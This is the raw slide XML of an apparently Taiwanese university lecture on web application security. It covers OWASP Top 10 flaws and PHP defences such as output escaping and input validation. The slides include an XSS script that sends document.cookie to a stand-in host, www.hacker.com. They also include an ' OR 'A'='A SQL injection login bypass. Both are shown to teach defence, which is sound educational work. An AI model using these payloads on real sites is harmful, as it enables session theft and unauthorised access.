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80" r:id="rId3"/>
    <p:sldId id="301" r:id="rId4"/>
    <p:sldId id="310" r:id="rId5"/>
    <p:sldId id="302" r:id="rId6"/>
    <p:sldId id="30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304" r:id="rId15"/>
    <p:sldId id="307" r:id="rId16"/>
    <p:sldId id="288" r:id="rId17"/>
    <p:sldId id="289" r:id="rId18"/>
    <p:sldId id="290" r:id="rId19"/>
    <p:sldId id="291" r:id="rId20"/>
    <p:sldId id="308" r:id="rId21"/>
    <p:sldId id="306" r:id="rId22"/>
    <p:sldId id="309" r:id="rId23"/>
    <p:sldId id="292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86410" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="120" d="100"/>
          <a:sy n="120" d="100"/>
        </p:scale>
        <p:origin x="-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439DE55-DD68-4D1A-97BE-7E0AC9A7C4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6981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行政大樓首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寬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81750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2988" y="2781300"/>
            <a:ext cx="74136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652963"/>
            <a:ext cx="6400800" cy="14652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3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7663" y="620713"/>
            <a:ext cx="2051050" cy="55451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6005513" cy="55451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3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158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26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40274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0290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70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76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265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172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5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8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行政大樓內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20713"/>
            <a:ext cx="7559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089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1" name="Picture 7" descr="寬3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81750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hp.net/manual/en/function.htmlspecialchars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XSS_(Cross_Site_Scripting)_Prevention_Cheat_She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p.net/manual/en/security.database.sql-injection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" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Taiw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owasp.org/www-project-top-t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wasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS)" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A2-Broken_Authentication" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A6-Security_Misconfiguration" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A1-Inj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asp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A5-Broken_Access_Control" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A10-Insufficient_Logging%252526Monitoring" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A4-XML_External_Entities_(XXE)" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A9-Using_Components_with_Known_Vulnerabilities" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A3-Sensitive_Data_Exposure" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A8-Insecure_Deserializ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wasp.org/index.php/Taiw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wasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013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WWW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>安全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國立暨南國際大學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資訊管理學系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陳彥錚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(3). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="3200" smtClean="0"/>
              <a:t>Broken Account and Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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655763"/>
            <a:ext cx="8077200" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="3000" smtClean="0"/>
              <a:t>Account credentials and session tokens are not properly protected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="3000" smtClean="0"/>
              <a:t>Attackers that can compromise passwords, keys, session cookies, or other tokens can defeat authentication restrictions and assume other users' identities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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3200" smtClean="0"/>
              <a:t>(4). Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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mtClean="0"/>
              <a:t>The web application can be used as a mechanism to transport an attack to an end user's browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" smtClean="0"/>
              <a:t>A successful attack can disclose the end user's session token, attack the local machine, or spoof content to fool the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"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SimSun" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XSS Example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41363" y="2405063"/>
          <a:ext cx="7521575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點陣圖影像" r:id="rId3" imgW="4237087" imgH="1531753" progId="Paint.Picture">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="點陣圖影像" r:id="rId3" imgW="4237087" imgH="153175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405063"/>
                        <a:ext cx="7521575" cy="2719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99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43063" y="3616325"/>
            <a:ext cx="6092825" cy="13112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000">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>&lt;script&gt;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000">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>window.location="http://www.hacker.com/steal.cgi?ck="+document.cookie;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TW" sz="2000">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>&lt;/script&gt;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46488" y="1733550"/>
            <a:ext cx="176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ahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>留言版</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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XSS Web Application Hijack Scenario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41475"/>
            <a:ext cx="841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376988" y="6072188"/>
            <a:ext cx="2116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新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>www.hacker.com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htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防範</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>XSS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1844824"/>
            <a:ext cx="8208963" cy="40324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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>postText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>=$_POST['comments'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>echo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htmlspecialchars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 smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>potText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ENT_QUOTES)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>;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2996952"/>
            <a:ext cx="4249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TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>不允許輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>形式的相關資料</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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zh-TW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 &amp;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    &gt;  &amp;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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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5733256"/>
            <a:ext cx="52565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php.net/manual/en/function.htmlspecialchars.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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536582" cy="18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29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XSS Prevention </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Rules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16832"/>
            <a:ext cx="8676456" cy="3600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/>
              <a:t>RULE 0 - Never Insert Untrusted Data Except in Allowed Locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>RULE 1 - HTML Escape Before Inserting Untrusted Data into HTML Element Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>RULE 2 - Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>RULE 3 - JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>RULE 3.1 - HTML escape JSON values in an HTML context and read the data with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>JSON.parse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RULE 4 - CSS Escape And Strictly Validate Before Inserting Untrusted Data into HTML Style Property Values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>RULE 5 - URL Escape Before Inserting Untrusted Data into HTML URL Parameter Values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>RULE 6 - Sanitize HTML Markup with a Library Designed for the Job</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>RULE 7 - Prevent DOM-based XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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395536" y="5661248"/>
            <a:ext cx="748883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1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet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383539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(5). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" smtClean="0"/>
              <a:t>Buffer Overflows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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mtClean="0"/>
              <a:t>Web application components in some languages that do not properly validate input can be crashed and, in some cases, used to take control of a process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" smtClean="0"/>
              <a:t>These components can include CGI, libraries, drivers, and web application server components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"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(6). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="3200" smtClean="0"/>
              <a:t>Command Injection Flaws</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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z="2800" smtClean="0"/>
              <a:t>Web applications pass parameters when they access external systems or the local operating system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2800" smtClean="0"/>
              <a:t>If an attacker can embed malicious commands in these parameters, the external system may execute those commands on behalf of the web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/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761163" y="4806950"/>
            <a:ext cx="2036762" cy="4302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08188" y="5264150"/>
            <a:ext cx="4919662" cy="14144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SQL Injection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8463" y="1684338"/>
            <a:ext cx="8513762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1000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2400" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SQLQuery =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2400" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“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SELECT 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  <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>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 FROM Users WHERE (UserName='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” + strUN + “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') AND (Password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” + strPW + “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');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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140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2400" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User name “fredchen”, password “199msq” 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SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 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  <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>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 FROM Users WHERE (UserName='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fredchen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') AND (Password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>199msq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>');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90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2400" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" smtClean="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection: User name/Password : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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' OR 'A'='A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" smtClean="0">
              <a:latin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2400" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/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79388" y="115888"/>
          <a:ext cx="284321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點陣圖影像" r:id="rId3" imgW="1440305" imgH="960203" progId="Paint.Picture">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="點陣圖影像" r:id="rId3" imgW="1440305" imgH="96020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2843212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993900" y="5372100"/>
            <a:ext cx="5138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US" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> FROM Users WHERE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US" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>(UserName='' OR 'A'='A') AND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US" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>(Password='' OR 'A'='A');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Input Validation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43113"/>
            <a:ext cx="852328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WWW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>安全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641475"/>
            <a:ext cx="8264525" cy="4724400"/>
          </a:xfrm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n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>Web security is important for E-Commerce.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>Previous studies: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="762000" lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="762000" lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>SET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="762000" lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>Web server security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>Application-level security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="762000" lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>Web applications mistakenly trust data returned from a client.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59675" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" err="1"/>
              <a:t>mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>()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zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>避免</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>SQL Injection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971600" y="2060848"/>
            <a:ext cx="756084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$con = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mysqli_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>("localhost","my_user","my_password","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>my_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>");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…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/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_real_escape_string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en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$con,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>$_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>']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;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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_real_escape_string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en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$con,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>$_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>']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;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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = "SELECT * FROM `users` WHERE `username`='".$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>."' AND `password`='".$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>."';";</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty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17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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>regular expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>限制輸入字元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27584" y="1844824"/>
            <a:ext cx="7488634" cy="26638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if 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preg_match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('/[^A-Za-z0-9_]/', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>$_POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>']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 smtClean="0"/>
              <a:t> )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die('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>使用者名稱輸入錯誤！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t> = $_POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>…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87624" y="4149080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只允許輸入 英文文數字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52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559675" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>advice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>in PHP.net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63" cy="4392612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
